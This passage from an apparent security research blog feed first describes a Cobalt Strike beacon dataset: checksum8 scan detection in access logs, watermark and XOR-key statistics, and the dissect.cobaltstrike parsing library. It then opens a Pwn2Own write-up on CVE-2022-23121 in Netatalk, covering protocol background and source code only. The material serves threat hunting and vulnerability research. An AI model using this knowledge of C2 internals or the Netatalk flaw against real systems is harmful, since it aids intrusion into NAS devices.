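            line = line.strip()
            if line:  # tolerate blank lines
                yield json.loads(line)


def count_field(rows, field):
    """Tally the values of one top-level field; rows lacking the field count as None."""
    return Counter(row.get(field) for row in rows)
```

For example, `count_field(iter_beacons("beacons.jsonl.gz"), "beacon_version").most_common(10)` would list the ten most frequent values of that field without loading the whole file into memory.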

While there are some trivial methods to identify cracked/pirated Cobalt Strike Team Servers from the beacon payload, it’s difficult to tell for the non-trivial ones. Therefore the dataset is unfiltered, full disclosure and contains all beacons we have collected.

Cobalt Strike Team Servers that are properly hidden or have payload staging disabled are, of course, not included. That means Red Teams (and sadly threat actors) with good OPSEC have nothing to worry about being present in this dataset. 🙂

Beacons, and where to find them

The Cobalt Strike beacons were acquired by first identifying Team Servers on the Internet and then downloading the beacon using a checksum8 HTTP request. This method is similar to how the company behind Cobalt Strike did their own Cobalt Strike Team Server Population Study back in 2019. 

Although the anomalous space fingerprint we used for identification was since fixed, we found other reliable methods for identifying Team Servers. In addition, we are sure that the original author of Cobalt Strike intentionally left some indicators in there to help blue teams. For that, we are grateful and hope this doesn’t change in the future.

Via our honeypots, we can tell that RIFT is not alone in mining beacons. Everyone is doing it now. The growing number of blog posts and example scripts on how to find Cobalt Strike probably contributes to this, next to the increased popularity of Cobalt Strike itself, of course.

The development of increased scanning for Cobalt Strike is fascinating to witness, including the different techniques and shotgun approaches for identifying Team Servers and retrieving beacons. Some even skip the identification part and go directly for the beacon request! As you can imagine, this can be noisy, which surely doesn’t go unnoticed by some threat actors.

If you run a public-facing web server, you can easily verify this increased scanning by checking the HTTP access logs for common checksum8-like requests, for example, by using the following grep command:

$ zgrep -hE "GET /[a-zA-Z0-9]{4} HTTP" /var/log/nginx/*.gz
172.x.x.x - - [23/Feb/2021:18:xx:08 +0100] "GET /0bef HTTP/1.0" 404 162 "-" "-"
172.x.x.x - - [24/Feb/2021:09:xx:40 +0100] "GET /0bef HTTP/1.0" 404 162 "-" "-"
139.x.x.x - - [25/Feb/2021:05:xx:39 +0100] "GET /bag2 HTTP/1.1" 404 193 "-" "-"
134.x.x.x - - [25/Feb/2021:15:xx:12 +0100] "GET /ab2g HTTP/1.1" 400 166 "-" "-"
134.x.x.x - - [25/Feb/2021:15:xx:22 +0100] "GET /ab2h HTTP/1.1" 400 166 "-" "-"

The requests shown above are checksum8 requests (for x86 and x64 beacons), hitting a normal webserver hosting a real website in February 2021.
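
To make the checksum8 check concrete, here is a minimal sketch of how such a request can be verified. It rests on two assumptions that come from public Metasploit and Cobalt Strike research rather than from this post: the checksum is the sum of the URI's byte values (ignoring slashes) modulo 256, and the values 92 and 93 select the x86 and x64 stager respectively. The function names are hypothetical, this is not the logic of our own script, and the third log line is made up as a negative example.

```python
import re

# Assumed stager checksum values (public research, not stated in this post):
# 92 selects the x86 stager, 93 the x64 stager.
STAGER_CHECKSUMS = {92: "x86", 93: "x64"}

# Matches a four-character alphanumeric GET path in an access log line.
REQUEST_RE = re.compile(r'"GET (/[A-Za-z0-9]{4}) HTTP/[0-9.]+')


def checksum8(uri):
    """Sum the byte values of the URI (ignoring slashes) modulo 256."""
    return sum(uri.replace("/", "").encode("ascii")) % 256


def classify_log_line(line):
    """Return (path, architecture) if the line looks like a stager request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    path = match.group(1)
    arch = STAGER_CHECKSUMS.get(checksum8(path))
    return (path, arch) if arch else None


for line in [
    '172.x.x.x - - [23/Feb/2021:18:xx:08 +0100] "GET /0bef HTTP/1.0" 404 162 "-" "-"',
    '139.x.x.x - - [25/Feb/2021:05:xx:39 +0100] "GET /bag2 HTTP/1.1" 404 193 "-" "-"',
    '10.x.x.x - - [25/Feb/2021:06:xx:00 +0100] "GET /test HTTP/1.1" 404 193 "-" "-"',
]:
    print(classify_log_line(line))
```

Under these assumptions, `/0bef` sums to 349 (93 modulo 256, x64) and `/bag2` sums to 348 (92, x86), while the made-up `/test` request matches the pattern but not the checksum and is ignored. This is why verifying the checksum is more accurate than a plain regular expression match.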

You can also use our checksum8-accesslogs.py script, which does all these things in one script and more accurately by verifying the checksum8 value. It can also output statistics. Here is an example of outputting the x86 and x64 beacon HTTP requests hitting one of our honeypots and generating the statistics:

checksum8-accesslog.py script finds possible Beacon stager requests in access logs

In the output, you can also see the different beacon scanning techniques being used, which we will leave as an exercise for the reader to figure out.

We can see an apparent increase in beacon scanning on one of our honeypots by plotting the statistics:

So if you ever wondered why people are requesting these weird four-character URLs (or other strange-looking URLs) on your web server, check the checksum8 value of the request, and you might have your answer.

We try to be a bit stealthier and won’t disclose our fingerprinting techniques, as we know threat actors are vigilant and would adapt, which in the long run would make things harder for everyone dealing with Threat Intelligence.

Cobalt Strike version usage over time

Because we have beacon metadata over multiple years, we can paint a pretty good picture of active Cobalt Strike servers on the Internet and which versions they were using at that time.

To extract the Cobalt Strike version data, we used the following two methods:

  • Using the Beacon Setting constants
    • When a new Cobalt Strike beacon configuration setting is introduced, the Setting constant is increased and then assigned. It’s possible to deduce the version based on the highest available constant in the extracted beacon configuration.
  • Using the PE export timestamp

Our Python library dissect.cobaltstrike supports both methods for deducing version numbers and favours the PE export timestamp when available.

The dataset already contains the beacon_version field for your convenience and is based on the PE export timestamp. Using this field, we can generate the following graph showing the different Cobalt Strike versions used on the Internet over time:

We can see that in April 2021, there was quite a prominent peak of online Cobalt Strike servers and unique beacons, but we are not sure what caused this except that there was a 3% increase of modified (likely malicious) beacons that month.

The following percentage-wise graph shows a clearer picture of the adoption and popularity between the different versions over time:

We can see that Cobalt Strike 4.0 (released in December 2019) remained quite popular from January 2020 to January 2021.

Beacon watermark statistics

Since Cobalt Strike 3.10 (released December 2017), the beacons contain a setting called SETTING_WATERMARK. This watermark value should be unique per Cobalt Strike installation, as the license server issues this.

However, cracked/pirated versions usually patch this to a fixed value, making it easy to identify which beacons are more likely to be malicious (i.e. not a penetration tester). This likelihood aligns with our incident response engagements so far, where beacons related to the compromise used known-bad watermarks.

Note that requesting a trial or buying a legitimate copy of Cobalt Strike is difficult for malicious actors as every user is vetted and screened. Because of these measures, there is a high asking price for a Cobalt Strike copy on the dark web. For example, Conti invested $60,000 to acquire a valid copy of Cobalt Strike.

If you find a beacon with a watermark in this top 50, then it’s most likely malicious!

Customized Beacons

While parsing collected beacons, we found that some were modified, for example, with a custom shellcode stub, non-default XOR keys or reassigned Beacon settings.

Therefore, the beacons with heavy customizations could not be dumped properly and are not included in the dataset.

The configuration block in the beacon payload is usually obfuscated using a single byte XOR key. Depending on the Cobalt Strike version, the default keys are 0x2e or 0x69.

The use of non-default XOR keys requires the user to modify the beacon and/or Team Server, as the key is not configurable by default. Here is an overview of the XOR keys seen across the unique beacon dataset:

Using a custom XOR key makes you an outlier, but it does protect you against some existing Cobalt Strike config dumpers. Our Python library dissect.cobaltstrike supports trying all XOR keys when the default XOR keys don’t work. For example, you can pass the command line flag --all-xor-keys to the beacon-dump command.
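
The idea of trying the default keys first and then falling back to every possible single-byte key can be sketched as follows. This is an illustration rather than how dissect.cobaltstrike implements it. It assumes that a decoded configuration block starts with the byte pattern `00 01 00 01 00 02`, which is commonly reported in public research but not stated in this post, and the function names are hypothetical.

```python
# Assumption (not from this post): the decoded config block is commonly
# reported to begin with these six bytes.
CONFIG_MARKER = bytes.fromhex("000100010002")

# Default single-byte XOR keys named in this post.
DEFAULT_KEYS = (0x2E, 0x69)


def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def find_config(blob, try_all_keys=False):
    """Return (key, offset) for the first key whose obfuscated marker occurs in blob."""
    keys = list(DEFAULT_KEYS)
    if try_all_keys:
        keys += [k for k in range(256) if k not in DEFAULT_KEYS]
    for key in keys:
        # Search for the XOR-ed marker instead of decoding the whole blob per key.
        offset = blob.find(xor_bytes(CONFIG_MARKER, key))
        if offset != -1:
            return key, offset
    return None
```

A six-byte marker can occur by chance in a large payload, so a real dumper would still need to validate the settings that follow the hit before trusting the key.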

Portable Executable artifacts

While most existing Cobalt Strike dumpers focus on the beacon settings, some settings from the Malleable C2 profiles will not end up in the embedded beacon config of the payload. For example, some Portable Executable (PE) settings in the Malleable C2 profile are applied directly to the beacon payload. Our Python library dissect.cobaltstrike supports extracting this information, and our dataset includes the following extracted PE header metadata:

  • magic_mz — MZ header
  • magic_pe — PE header
  • pe_compile_stamp — PE compilation stamp
  • pe_export_stamp — timestamp of the export section
  • stage_prepend – (shellcode) bytes prepended to the start of the beacon payload
  • stage_append — bytes appended to the end of the beacon payload

We created an overview of the most common stage_prepend values that consist entirely of ASCII bytes. These bytes are prepended in front of the MZ header and have to be valid assembly code that results in a no-operation, as they are executed as shellcode. Some are quite creative:

If we disassemble the example stage_prepend shellcode JFIFJFIF, we can see that it increments the ESI register and decrements the EDX and ECX registers, leaving them modified as a result. So it’s not fully a no-operation shellcode, but it most likely doesn’t affect the staging process either.

$ echo -n JFIFJFIF | ndisasm -b 32 /dev/stdin
00000000  4A                dec edx
00000001  46                inc esi
00000002  49                dec ecx
00000003  46                inc esi
00000004  4A                dec edx
00000005  46                inc esi
00000006  49                dec ecx
00000007  46                inc esi
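
The net effect of such a prepend can also be computed without a disassembler. In 32-bit mode the opcodes 0x40 to 0x47 are one-byte `inc` instructions and 0x48 to 0x4F are one-byte `dec` instructions, which covers the ASCII characters `@` through `O`. The sketch below only handles those sixteen opcodes and raises on anything else; the function name is hypothetical.

```python
from collections import Counter

# 32-bit register order used by the one-byte INC (0x40+r) and DEC (0x48+r) opcodes.
REGISTERS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def net_register_effect(prepend):
    """Return the net change per register, raising on any other opcode."""
    effect = Counter()
    for opcode in prepend:
        if 0x40 <= opcode <= 0x47:
            effect[REGISTERS[opcode - 0x40]] += 1
        elif 0x48 <= opcode <= 0x4F:
            effect[REGISTERS[opcode - 0x48]] -= 1
        else:
            raise ValueError(f"opcode {opcode:#04x} is not a one-byte inc/dec")
    # Drop registers whose increments and decrements cancel out.
    return {reg: delta for reg, delta in effect.items() if delta}


print(net_register_effect(b"JFIFJFIF"))  # {'edx': -2, 'esi': 4, 'ecx': -2}
```

A prepend that pairs every increment with a matching decrement, such as `@H` (`inc eax` followed by `dec eax`), yields an empty result and is a true no-operation as far as these registers are concerned.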

You can check our Jupyter notebook for an overview on the rest of the PE artifacts, such as magic_mz and magic_pe.

Watermarked releasenotes.txt using whitespace

The author of Cobalt Strike must really like spaces: after the erroneous space in the HTTP server header, there is now also a (repurposed) beacon setting called SETTING_SPAWNTO that is populated with the MD5 hash of the file releasenotes.txt (or accidentally another file in the same directory if that matches the same checksum8 value of 152 and filename length!).

The releasenotes.txt is automatically downloaded from the license server when you activate or update your Cobalt Strike server. To our surprise, we discovered that this file is most likely watermarked using whitespace characters thus making this file and MD5 hash unique per installation. The license server probably keeps track of all these uniquely generated files to help combat piracy and leaks of Cobalt Strike.

While this is pretty clever, we found that in some pirated beacons this field is all zeroes or not available. This means that whoever cracked the release either knew about this file and decided not to ship it in the pirated version, or patched out the field value. Nevertheless, this field is still useful for hunting or correlating beacons when it is available.

Note the subtle whitespace changes at the end of the lines between the two releasenotes.txt files. 
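
Why trailing whitespace is enough to make the hash unique can be shown in a few lines. The file contents below are hypothetical and the actual watermarking scheme is not known to us; the sketch only illustrates that two copies can look identical in a viewer while producing different MD5 hashes.

```python
import hashlib

# Hypothetical file contents; only the trailing whitespace differs.
copy_a = b"Cobalt Strike Release Notes\n---------------------------\n"
copy_b = b"Cobalt Strike Release Notes \n---------------------------\t\n"


def md5_hex(data):
    """Return the MD5 digest of data as a hex string."""
    return hashlib.md5(data).hexdigest()


def visible_text(data):
    """Strip trailing whitespace per line, approximating what a reader sees."""
    return [line.rstrip() for line in data.decode("ascii").splitlines()]


print(visible_text(copy_a) == visible_text(copy_b))  # True: same visible text
print(md5_hex(copy_a) == md5_hex(copy_b))            # False: different hashes
```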

Analyze Beacon payloads with dissect.cobaltstrike

We are also proud to open-source our Python library for dissecting Cobalt Strike, aptly named dissect.cobaltstrike. The library is available on PyPI and requires Python 3.6 or higher. You can use pip to install it:

$ pip install dissect.cobaltstrike

The project’s GitHub repository: https://github.com/fox-it/dissect.cobaltstrike

It currently installs three command line tools for your convenience:

  • beacon-dump – used for dumping configuration from beacon payloads (also works on memory dumps)
  • beacon-xordecode – a standalone tool for decoding xorencoded payloads
  • c2profile-dump – use this to read and parse Malleable C2 profiles.

A neat feature of beacon-dump is that it can dump the beacon configuration back as its Malleable C2 profile compatible equivalent:

Dumping beacons settings as a Malleable C2 Profile

While these command line tools provide most of the boilerplate for working with Beacon payloads, you can also import the library in a script or notebook for more advanced use cases. See our notebook and documentation for some examples.

Closing thoughts

The beacon dataset has proved very useful to us; its historical aspect in particular is insightful during incident response engagements. We use the dataset daily for purposes ranging from C2 infrastructure mapping, actor tracking and threat hunting to producing high-quality indicators and detection engineering.

We hope this dataset and Python library will be as helpful to the community as they are to us, and we are eager to see what kind of exciting things people will come up with or find using the data and tooling. What we have shown in this blog is only the tip of the iceberg of what you can uncover from beacon data.

Some ideas for the readers:

  • Cluster beacon and C2 profile features using a clustering algorithm such as DBSCAN.
  • Improve the classification of malicious beacons. You can find the current classification method in our notebook.
  • Use the GeoIP ASN data to determine where the most malicious beacons are hosted.
  • Analyse the x509 certificate data, for example whether certificates are self-signed.
  • Determine if a beacon uses domain fronting and which CDN.

All the statistics shown in this blog post can also be found in our accompanying Jupyter notebook including some more statistics and overviews not shown in this blog.

We also want to thank Rapid7 for the Open Data sets, without this data the beacon dataset would be far less complete!

Final links for convenience:

Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)

24 March 2022 at 13:13
Mooncake Exploit

Summary

This blog post describes an unchecked return value vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at the Pwn2Own 2021 competition in November 2021 when targeting the Western Digital PR4100. Western Digital published a firmware update (5.19.117) which entirely removed support for the vulnerable open-source third-party service, "Depreciated Netatalk Service". As this vulnerability was addressed in the upstream Netatalk code, CVE-2022-23121 was assigned, a ZDI advisory was published, and a new Netatalk release (3.1.13) was distributed which fixed this vulnerability together with a number of others.

Introduction

The vulnerability is in the Netatalk project, which is an open-source implementation of the Apple Filing Protocol (AFP). The Netatalk code is implemented in the /usr/sbin/afpd service and the /lib64/libatalk.so library. The afpd service is running by default on the Western Digital My Cloud Pro Series PR4100 NAS.

This vulnerability can be exploited remotely and does not need authentication. It allows an attacker to get remote code execution as the nobody user on the NAS. This user can access private shares that would normally require authentication.

We have analysed and exploited the vulnerability on version 5.17.107, which we detail below, but older versions are likely vulnerable too.

Note: The Western Digital My Cloud Pro Series PR4100 NAS is based on the x86_64 architecture.

We have named our exploit "Mooncake". This is because we finished writing our exploit on the 21st September 2021, which happens to be the day of the Mid-Autumn Festival a.k.a Mooncake festival in 2021.

Vulnerability details

Background

DSI / AFP protocols

The Apple Filing Protocol (AFP) is an alternative to the well known Server Message Block (SMB) protocol to share files over the network. The AFP specification can be found here.

AFP is transmitted over the Data Stream Interface (DSI) protocol, itself transmitted over TCP/IP, on TCP port 548.
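
To make the layering concrete, here is a minimal sketch that packs and unpacks a DSI header around an AFP payload. The 16-byte layout (flags, command, request ID, error code or data offset, total data length, reserved) and the command values reflect our understanding of the DSI specification and of Netatalk's DSIFUNC_* constants; treat them as assumptions to verify against the specification. The one-byte payload is a truncated placeholder, not a valid AFP request.

```python
import struct
from typing import NamedTuple

DSI_PORT = 548                        # TCP port used by AFP over DSI
DSI_HEADER = struct.Struct(">BBHIII")  # big-endian, 16 bytes in total

DSIFL_REQUEST = 0x00  # assumed flag value for a request
DSIFUNC_CMD = 2       # assumed value: DSI command carrying an AFP request
DSIFUNC_OPEN = 4      # assumed value: DSI open session


class DsiHeader(NamedTuple):
    flags: int
    command: int
    request_id: int
    code_or_offset: int
    length: int
    reserved: int


def pack_dsi(command: int, request_id: int, payload: bytes = b"") -> bytes:
    """Prefix an AFP payload with a DSI request header."""
    header = DSI_HEADER.pack(DSIFL_REQUEST, command, request_id, 0, len(payload), 0)
    return header + payload


def unpack_dsi(packet: bytes):
    """Split a DSI packet into its header fields and its AFP payload."""
    header = DsiHeader(*DSI_HEADER.unpack_from(packet))
    start = DSI_HEADER.size
    return header, packet[start:start + header.length]


# Placeholder payload: only the first byte (the AFP function number) is shown.
packet = pack_dsi(DSIFUNC_CMD, request_id=1, payload=b"\x1a")
header, payload = unpack_dsi(packet)
print(header, payload)
```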

However, SMB seems to have won the battle of the network file sharing protocols and AFP is less well known, even if it is still supported in devices such as NAS. AFP was deprecated in OS X 10.9 and the AFP server was removed in macOS 11.

Netatalk

The Netatalk project is an implementation of AFP/DSI for UNIX platforms that was moved to SourceForge in 2000. Its original purpose was to allow UNIX-like operating systems to serve as AFP servers for many Macintosh / OS X clients.

As detailed earlier, AFP is attracting less and less interest. This is reflected in the Netatalk project too. The latest stable Netatalk release (3.1.12) dates from December 2018, which makes it a rather deprecated and unsupported project.

The Netatalk project was vulnerable to the CVE-2018-1160 vulnerability which was an out-of-bounds write in the DSIOpensession command (dsi_opensession()) in Netatalk < 3.1.12. This was successfully exploited on Seagate NAS due to no ASLR and later on environments with ASLR as part of the Hitcon 2019 CTF challenge.

AppleDouble file format

The AppleSingle and AppleDouble file formats aim to store regular files’ metadata and allow that information to be shared between different filesystems without having to worry about interoperability.

The main idea is based on the fact that any filesystem can store files as a series of bytes. So it is possible to save regular files’ metadata (a.k.a. attributes) into additional files alongside the regular files and reflect these attributes (or at least some of them) back to the other end if the other end’s filesystem supports them. Otherwise, the additional attributes can be discarded.

The AppleSingle and AppleDouble specification can be found here. The AppleDouble file format is also explained in the samba source code with this diagram:

/*
   "._" AppleDouble Header File Layout:
         MAGIC          0x00051607
         VERSION        0x00020000
         FILLER         0
         COUNT          2
     .-- AD ENTRY[0]    Finder Info Entry (must be first)
  .--+-- AD ENTRY[1]    Resource Fork Entry (must be last)
  |  |   /////////////
  |  '-> FINDER INFO    Fixed Size Data (32 Bytes)
  |      ~~~~~~~~~~~~~  2 Bytes Padding
  |      EXT ATTR HDR   Fixed Size Data (36 Bytes)
  |      /////////////
  |      ATTR ENTRY[0] --.
  |      ATTR ENTRY[1] --+--.
  |      ATTR ENTRY[2] --+--+--.
  |         ...          |  |  |
  |      ATTR ENTRY[N] --+--+--+--.
  |      ATTR DATA 0   <-'  |  |  |
  |      ////////////       |  |  |
  |      ATTR DATA 1   <----'  |  |
  |      /////////////         |  |
  |      ATTR DATA 2   <-------'  |
  |      /////////////            |
  |         ...                   |
  |      ATTR DATA N   <----------'
  |      /////////////
  |         ...          Attribute Free Space
  |
  '----> RESOURCE FORK
            ...          Variable Sized Data
            ...
*/
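
The layout in the diagram can be exercised with a short sketch that builds and parses a simplified AppleDouble file. It assumes the usual on-disk encoding: big-endian fields, a 16-byte filler, a 2-byte entry count, 12-byte entry descriptors (ID, offset, length), and entry IDs 9 for Finder Info and 2 for the resource fork. The extended attribute area from the diagram is deliberately left out, and the function names are ours.

```python
import struct

AD_MAGIC = 0x00051607
AD_VERSION = 0x00020000
ENTRY_FINDER_INFO = 9     # assumed AppleDouble entry ID for Finder Info
ENTRY_RESOURCE_FORK = 2   # assumed AppleDouble entry ID for the resource fork

HEADER = struct.Struct(">II16sH")  # magic, version, filler, entry count
ENTRY = struct.Struct(">III")      # entry ID, offset, length


def build_appledouble(finder_info: bytes, resource_fork: bytes) -> bytes:
    """Build a two-entry AppleDouble file: Finder Info first, resource fork last."""
    finder_off = HEADER.size + 2 * ENTRY.size
    rfork_off = finder_off + len(finder_info)
    blob = HEADER.pack(AD_MAGIC, AD_VERSION, b"\0" * 16, 2)
    blob += ENTRY.pack(ENTRY_FINDER_INFO, finder_off, len(finder_info))
    blob += ENTRY.pack(ENTRY_RESOURCE_FORK, rfork_off, len(resource_fork))
    return blob + finder_info + resource_fork


def parse_appledouble(blob: bytes) -> dict:
    """Return {entry ID: (offset, length)} for every entry descriptor."""
    magic, version, _filler, count = HEADER.unpack_from(blob, 0)
    if magic != AD_MAGIC or version != AD_VERSION:
        raise ValueError("not an AppleDouble version 2 file")
    entries = {}
    for i in range(count):
        eid, off, length = ENTRY.unpack_from(blob, HEADER.size + i * ENTRY.size)
        entries[eid] = (off, length)
    return entries


blob = build_appledouble(b"\0" * 32, b"resource fork bytes")
entries = parse_appledouble(blob)
print(entries)
```

Note that the offsets and lengths are simply values stored in the file, so whoever writes the file chooses them.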

The afpd binary and libatalk.so library don’t have symbols. However, due to the GNU General Public License (GPL), Western Digital published the open-source Netatalk implementation they used, as well as the patches they applied, here. The latest source code archive Western Digital published was for version 5.16.105 and does not match the latest version analysed (5.17.107). However, we have confirmed that afpd and libatalk.so have never been modified in any OS 5 version so far. Consequently, the code shown below generally refers to the Netatalk source code.

NOTE: Western Digital PR4100 uses the latest 3.1.12 netatalk source code as a base.

Let’s analyse how the netatalk code accepts client connections and parses AFP requests, in order to reach the vulnerable code that deals with opening fork files stored in the AppleDouble file format.

The main() entry point function initialises lots of objects in memory, loads the AFP configuration, and starts listening on the AFP port (TCP 548).

//netatalk-3.1.12/etc/afpd/main.c
int main(int ac, char **av)
{
    ...
    /* wait for an appleshare connection. parent remains in the loop
     * while the children get handled by afp_over_{asp,dsi}.  this is
     * currently vulnerable to a denial-of-service attack if a
     * connection is made without an actual login attempt being made
     * afterwards. establishing timeouts for logins is a possible
     * solution. */
    while (1) {
        ...
        for (int i = 0; i < asev->used; i++) {
            if (asev->fdset[i].revents & (POLLIN | POLLERR | POLLHUP | POLLNVAL)) {
                switch (asev->data[i].fdtype) {

                case LISTEN_FD:
                    if ((child = dsi_start(&obj, (DSI *)(asev->data[i].private), server_children))) {
                        ...
                    }
                    break;
    ...

The dsi_start() function basically calls into 2 functions: dsi_getsession() and afp_over_dsi().

//netatalk-3.1.12/etc/afpd/main.c
static afp_child_t *dsi_start(AFPObj *obj, DSI *dsi, server_child_t *server_children)
{
    afp_child_t *child = NULL;

    if (dsi_getsession(dsi, server_children, obj->options.tickleval, &child) != 0) {
        LOG(log_error, logtype_afpd, "dsi_start: session error: %s", strerror(errno));
        return NULL;
    }

    /* we've forked. */
    if (child == NULL) {
        configfree(obj, dsi);
        afp_over_dsi(obj); /* start a session */
        exit (0);
    }

    return child;
}

dsi_getsession() calls the dsi->proto_open function pointer, which points to dsi_tcp_open():

//netatalk-3.1.12/libatalk/dsi/dsi_getsess.c
/*!
 * Start a DSI session, fork an afpd process
 *
 * @param childp    (w) after fork: parent return pointer to child, child returns NULL
 * @returns             0 on sucess, any other value denotes failure
 */
int dsi_getsession(DSI *dsi, server_child_t *serv_children, int tickleval, afp_child_t **childp)
{
  ...
  switch (pid = dsi->proto_open(dsi)) { /* in libatalk/dsi/dsi_tcp.c */

The dsi_tcp_open() function accepts a client connection, creates a subprocess with fork() and starts initialising the DSI session with the client.

Teaser: That will be useful for exploitation.

/* accept the socket and do a little sanity checking */
static pid_t dsi_tcp_open(DSI *dsi)
{
    pid_t pid;
    SOCKLEN_T len;

    len = sizeof(dsi->client);
    dsi->socket = accept(dsi->serversock, (struct sockaddr *) &dsi->client, &len);
    ...
   if (0 == (pid = fork()) ) { /* child */
        ...
    }

    /* send back our pid */
    return pid;
}

Back in dsi_getsession(), the parent afpd sets *childp to a non-NULL value, whereas the forked child afpd handling the client connection sets *childp to NULL:

//netatalk-3.1.12/libatalk/dsi/dsi_getsess.c
/*!
 * Start a DSI session, fork an afpd process
 *
 * @param childp    (w) after fork: parent return pointer to child, child returns NULL
 * @returns             0 on sucess, any other value denotes failure
 */
int dsi_getsession(DSI *dsi, server_child_t *serv_children, int tickleval, afp_child_t **childp)
{
  ...
  switch (pid = dsi->proto_open(dsi)) { /* in libatalk/dsi/dsi_tcp.c */
  case -1:
    /* if we fail, just return. it might work later */
    LOG(log_error, logtype_dsi, "dsi_getsess: %s", strerror(errno));
    return -1;

  case 0: /* child. mostly handled below. */
    break;

  default: /* parent */
    /* using SIGKILL is hokey, but the child might not have
     * re-established its signal handler for SIGTERM yet. */
    close(ipc_fds[1]);
    if ((child = server_child_add(serv_children, pid, ipc_fds[0])) ==  NULL) {
      LOG(log_error, logtype_dsi, "dsi_getsess: %s", strerror(errno));
      close(ipc_fds[0]);
      dsi->header.dsi_flags = DSIFL_REPLY;
      dsi->header.dsi_data.dsi_code = htonl(DSIERR_SERVBUSY);
      dsi_send(dsi);
      dsi->header.dsi_data.dsi_code = DSIERR_OK;
      kill(pid, SIGKILL);
    }
    dsi->proto_close(dsi);
    *childp = child;
    return 0;
  }
  ...
  switch (dsi->header.dsi_command) {
  ...
  case DSIFUNC_OPEN: /* setup session */
    /* set up the tickle timer */
    dsi->timer.it_interval.tv_sec = dsi->timer.it_value.tv_sec = tickleval;
    dsi->timer.it_interval.tv_usec = dsi->timer.it_value.tv_usec = 0;
    dsi_opensession(dsi);
    *childp = NULL;
    return 0;

  default: /* just close */
    LOG(log_info, logtype_dsi, "DSIUnknown %d", dsi->header.dsi_command);
    dsi->proto_close(dsi);
    exit(EXITERR_CLNT);
  }
}

We are now back in dsi_start(). For the parent, nothing more happens and the infinite loop in main() continues waiting for other client connections. For the child handling the connection, afp_over_dsi() is called. This function reads the AFP packet (which is the DSI payload), determines the AFP command and calls a function pointer inside the afp_switch[] global array to handle that AFP command.

//netatalk-3.1.12/etc/afpd/afp_dsi.c
/* -------------------------------------------
 afp over dsi. this never returns.
*/
void afp_over_dsi(AFPObj *obj)
{
    ...
    /* get stuck here until the end */
    while (1) {
        ...
        /* Blocking read on the network socket */
        cmd = dsi_stream_receive(dsi);
        ...
        switch(cmd) {
        ...
        case DSIFUNC_CMD:
            ...
                /* send off an afp command. in a couple cases, we take advantage
                 * of the fact that we're a stream-based protocol. */
                if (afp_switch[function]) {
                    dsi->datalen = DSI_DATASIZ;
                    dsi->flags |= DSI_RUNNING;

                    LOG(log_debug, logtype_afpd, "<== Start AFP command: %s", AfpNum2name(function));

                    AFP_AFPFUNC_START(function, (char *)AfpNum2name(function));
                    err = (*afp_switch[function])(obj,
                                                  (char *)dsi->commands, dsi->cmdlen,
                                                  (char *)&dsi->data, &dsi->datalen);

The afp_switch[] global array initially points to preauth_switch, which contains only the few handlers available pre-authentication. We can guess it is set to postauth_switch once the client is authenticated. This gives access to a lot of other AFP features.

//netatalk-3.1.12/etc/afpd/switch.c
/*
 * Routines marked "NULL" are not AFP functions.
 * Routines marked "afp_null" are AFP functions
 * which are not yet implemented. A fine line...
 */
static AFPCmd preauth_switch[] = {
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*   0 -   7 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*   8 -  15 */
    NULL, NULL, afp_login, afp_logincont,
    afp_logout, NULL, NULL, NULL,				/*  16 -  23 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  24 -  31 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  32 -  39 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  40 -  47 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  48 -  55 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, afp_login_ext,				/*  56 -  63 */
    ...
};

AFPCmd *afp_switch = preauth_switch;

AFPCmd postauth_switch[] = {
    NULL, afp_bytelock, afp_closevol, afp_closedir,
    afp_closefork, afp_copyfile, afp_createdir, afp_createfile,	/*   0 -   7 */
    afp_delete, afp_enumerate, afp_flush, afp_flushfork,
    afp_null, afp_null, afp_getforkparams, afp_getsrvrinfo,	/*   8 -  15 */
    afp_getsrvrparms, afp_getvolparams, afp_login, afp_logincont,
    afp_logout, afp_mapid, afp_mapname, afp_moveandrename,	/*  16 -  23 */
    afp_openvol, afp_opendir, afp_openfork, afp_read,
    afp_rename, afp_setdirparams, afp_setfilparams, afp_setforkparams,
    /*  24 -  31 */
    afp_setvolparams, afp_write, afp_getfildirparams, afp_setfildirparams,
    afp_changepw, afp_getuserinfo, afp_getsrvrmesg, afp_createid, /*  32 -  39 */
    afp_deleteid, afp_resolveid, afp_exchangefiles, afp_catsearch,
    afp_null, afp_null, afp_null, afp_null,			/*  40 -  47 */
    afp_opendt, afp_closedt, afp_null, afp_geticon,
    afp_geticoninfo, afp_addappl, afp_rmvappl, afp_getappl,	/*  48 -  55 */
    afp_addcomment, afp_rmvcomment, afp_getcomment, NULL,
    ...
};
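
The dispatch mechanism can be modelled in a few lines. This is a simplified sketch rather than afpd's logic: sparse dictionaries stand in for the C arrays, the handlers are hypothetical stubs, and the table swap on login is only our guess at what happens after authentication. The function numbers 18 and 26 are read off the positions of afp_login and afp_openfork in the tables above.

```python
# AFP function numbers, taken from the index positions in the C tables.
AFP_LOGIN = 18
AFP_OPENFORK = 26


def afp_login(session, payload):
    # Hypothetical stand-in for authentication: on success the active
    # table is swapped, which is what we guess afpd does.
    session["switch"] = POSTAUTH_SWITCH
    return "login ok"


def afp_openfork(session, payload):
    # Hypothetical stub for the handler we want to reach.
    return "openfork reached"


# A missing key plays the role of a NULL entry in the C arrays.
PREAUTH_SWITCH = {AFP_LOGIN: afp_login}
POSTAUTH_SWITCH = {AFP_LOGIN: afp_login, AFP_OPENFORK: afp_openfork}


def dispatch(session, function, payload=b""):
    """Look up the handler for an AFP function number and call it."""
    handler = session["switch"].get(function)
    if handler is None:
        return "unsupported"
    return handler(session, payload)


session = {"switch": PREAUTH_SWITCH}
before = dispatch(session, AFP_OPENFORK)
dispatch(session, AFP_LOGIN)
after = dispatch(session, AFP_OPENFORK)
print(before, "->", after)
```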

